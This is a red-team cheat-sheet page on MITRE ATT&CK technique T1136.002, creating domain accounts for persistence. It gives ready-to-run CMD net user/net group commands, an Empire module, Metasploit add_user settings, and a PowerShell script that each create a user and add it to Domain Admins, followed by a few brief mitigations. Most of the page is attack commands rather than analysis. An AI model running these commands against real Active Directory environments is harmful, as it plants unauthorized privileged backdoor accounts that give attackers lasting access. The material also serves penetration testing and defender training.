Domain Account
https://attack.mitre.org/techniques/T1136/002/
ATT&CK ID: T1136.002
Permissions Required: Administrator
Description
Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain
command can be used to create a domain account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Techniques
CMD
# Create Domain User
net user "<Username>" "<Password>" /add /domain
# Add to Domain Admins Group
net group "Domain Admins" "<Username>" /add /domain

Empire
usemodule/powershell/persistence/misc/add_netuser
# Local account
set Domain ''
set UserName <Username>
execite
# Domain Account
set Domain <Domain>
set UserName <Username>
execute

Metasploit
use post/windows/manage/add_user
# Change ADDTODOMAIN to FALSE to create local account
Name Current Setting Required Description
---- --------------- -------- -----------
ADDTODOMAIN true yes Add to Domain if true, otherwise add locally
ADDTOGROUP true yes Add group if it does not exist
GROUP Domain Admins no Add user into group, creating it if necessary
PASSWORD Password123 no Password of the user
SESSION Session 1 yes The session to run this module on
TOKEN no Username or PID of the token which will be used (if blank, Domain Admin tokens will be enumerated)
USERNAME ViperOne yes The username of the user to add (not-qualified, e.g. BOB)
PowerShell
$Name = "<Username>"
$Domain = "<Domain>"
$Password = "Password123"
$SecurePass = ConvertTo-SecureString -String $Password -AsPlainText -Force
$NewUser = New-ADUser `
-Name "$Name"`
-SamAccountName "$Name"`
-UserPrincipalName "$Name@$Domain"`
-AccountPassword $SecurePass;
Enable-ADAccount -Identity "$Name";
Add-ADGroupMember -Identity "Domain Admins" -Members "$Name"

Mitigation
Protect domain controllers by ensuring proper security configuration for critical servers.
Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts.
Use multi-factor authentication for user and privileged accounts.
Further Reading
PowerShell: https://docs.microsoft.com/en-us/powershell/module/activedirectory/new-aduser?view=windowsserver2022-ps****
Last updated